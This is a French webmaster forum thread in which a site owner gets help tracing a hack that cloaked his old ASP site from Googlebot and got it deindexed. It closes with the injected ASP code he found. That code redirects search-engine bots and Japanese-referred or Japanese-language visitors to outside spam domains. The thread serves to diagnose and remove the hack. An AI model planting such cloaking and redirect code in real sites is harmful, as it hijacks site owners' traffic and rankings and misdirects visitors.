Hacking sur la page vue par Google Bot (non WP)

oxedet · 1 Août 2021

Bonjour,
J'ai mon site qui s'est littéralement effondré en quelques semaines (toutes les pages ont été déréférencées). En cause : un hacking sur la page vue par Google Bot (autres bots ou accès direct : pas de pb). C'est un vieux site en asp dont je maîtrise la totalité du code et je ne trouve aucune trace de script douteux, pourtant j'ai bien identifié un piratage en janvier dernier. Il est sous IIS/Windows. Quelqu'un a-t-il une piste ?
lien : https://annuaire-equestre.com
PS : c'est pas mon gagne-pain, mais il a 17 ans d'age, ça me fait mal au coeur de le voir dans cet état...
Merci d'avance
Cordialement
Laurent

Marie-Aude · 1 Août 2021

Moi j'ai des erreurs sur toutes les pages du menu :
https://gyazo.com/1fb59e3f408406cc45f1b7c0b41a15f4

rick38 · 2 Août 2021

Oui il y a aucune page sauf la home, donc un peu normal que tout soit déréférencé...

oxedet · 2 Août 2021

Oops, erreur de ma part (je me prends les pieds dans mes configs à force de chercher)... la navigation "normal" est revenue mais le problème persiste...

Merci

emualliug · 2 Août 2021

https://developers.google.com/web/fundamentals/security/hacked/fixing_the_japanese_keyword_hack

oxedet · 2 Août 2021

emualliug a dit:
https://developers.google.com/web/fundamentals/security/hacked/fixing_the_japanese_keyword_hack

Merci, mais j'ai déjà traité cette page : pas de CMS, pas de .htaccess (car sous Windows), pas de PHP, pas de comptes exotiques sur ma search console, pas .html douteuses... Il y a bien eu cependant des fichiers .asp trouvés contenant des scripts de piratage mais nettoyés depuis. C'est leur impact que j'arrive pas à cibler.

emualliug · 2 Août 2021

Si le site est propre il faut attendre qu'il soit à nouveau crawlé et indexé. La page d'accueil de ton site en cache chez Google remonte 27 juil. 2021 19:56:19. Je suppose que le nettoyage est postérieur. Le reste, c'est de l'attente. Demander une réindexation de la home via la searchconsole si ce n'est déjà fait.

Marie-Aude · 3 Août 2021

Pendant qu'on y est, il y a un pb sur cette page
https://annuaire-equestre.com/annuaire/repertoire et sur celle là https://annuaire-equestre.com/annonces

oxedet · 3 Août 2021

emualliug a dit:
Si le site est propre il faut attendre qu'il soit à nouveau crawlé et indexé. La page d'accueil de ton site en cache chez Google remonte 27 juil. 2021 19:56:19. Je suppose que le nettoyage est postérieur. Le reste, c'est de l'attente. Demander une réindexation de la home via la searchconsole si ce n'est déjà fait.

Merci, j'ai effectivement demandé une ré indexation il y a quelques jours, sans insister... Cependant, sur un "test en direct de l'url" depuis la search console, la réponse est maintenant pire : j'ai un 404 ! :-( je vais devenir chèvre...

oxedet · 3 Août 2021

Marie-Aude a dit:
Pendant qu'on y est, il y a un pb sur cette page
https://annuaire-equestre.com/annuaire/repertoire et sur celle là https://annuaire-equestre.com/annonces

Oui, ça été ma preuve que quelque chose a bougé : l'encodage des pages, pourtant en UTF8 de bout en bout, a été perturbé. Je suis obligé de réencoder les contenus (la grande majorité issue de la BDD) à la volée... (je viens de le faire sur ces pages).

spout · 3 Août 2021

Le hack est toujours là :

cthierry · 3 Août 2021

En effet Spout : https://www.webrankinfo.com/outils/...equestre.com/annuaire/repertoire&ua=googlebot

Perso je commence par rechercher si il n'y a pas un "daiku" qui traine sur la bdd, les fichiers du site, en espérant que le mec a pas encodé sa merde. Ensuite, test en local ou sur autre serveur pour vérifier que ce n'est pas ce dernier qui est vérolé. Car si tu as déjà nettoyé et que le problème est toujours là, c'est qu'il y a une porte ouverte quelque part.

oxedet · 3 Août 2021

Trouvé !
voici ci-dessous, pour info, le code injecté dans un des fichiers includes, il est explicite dans sa finalité...
- je cherchai dans mes fichiers par date de modification (au alentour du 16/01/2021) mais celui-ci est resté daté de 2017, contournement système...
- dans son injection, le fichier était passé d'UTF8 à UTF8BOM d'où les perturbations d'affichages
Conclusion : j'aurai pas du jouer en finesse et republier sans me poser de questions tout mes fichiers de codes depuis ma source sûre...
Conclusion2 : ça m'a obligé à épurer toutes les pages des trucs inutiles (JS FB, OneSignal, FontAwesome...)
Conclusion3 : il faut maintenant que je remonte à la faille originelle, mais là j'ai ma petite idée.

Merci à tous !

Code:

<%
function Getbot()
dim s_agent
GetBot=""
s_agent=Request.ServerVariables("HTTP_USER_AGENT")
if instr(1,s_agent,"googlebot",1) > 0 then
GetBot="google"
end if
if instr(1,s_agent,"baiduspider",1) > 0 then
GetBot="baidu"
end if
if instr(1,s_agent,"slurp",1) > 0 then
GetBot="Yahoo"
end if
if instr(1,s_agent,"Bingbot",1) > 0 then
GetBot="Bing"
end if
if instr(1,s_agent,"sougouspider",1) > 0 then
GetBot="sougou"
end if
end function
if GetBot="baidu" or GetBot="google" or GetBot="yahoo" or GetBot="360" then

Response.Redirect "[URL]http://daiku.co.jp/form/ovus/buy_74wxn.html[/URL]"
else

end if
if instr(Request.ServerVariables("http_referer"),"google.co.jp")>0 then
'
response.redirect("[URL]http://www.downjackatjp.com/lv/[/URL]")
'
end if

if instr(Request.ServerVariables("http_referer"),"yahoo.co.jp")>0 then
'
response.redirect("[URL]http://www.downjackatjp.com/lv/[/URL]")
'
end if

if instr(Request.ServerVariables("http_referer"),"docomo.ne.jp")>0 then
'
response.redirect("[URL]http://www.downjackatjp.com/lv/[/URL]")
'
end if

Dim Language

Language=Request.ServerVariables("HTTP_ACCEPT_LANGUAGE")

If InStr(Language,"ja")>0 Or InStr(Language, "jp")>0 then

response.redirect("[URL]http://www.downjackatjp.com/lv/[/URL]")

end if

%>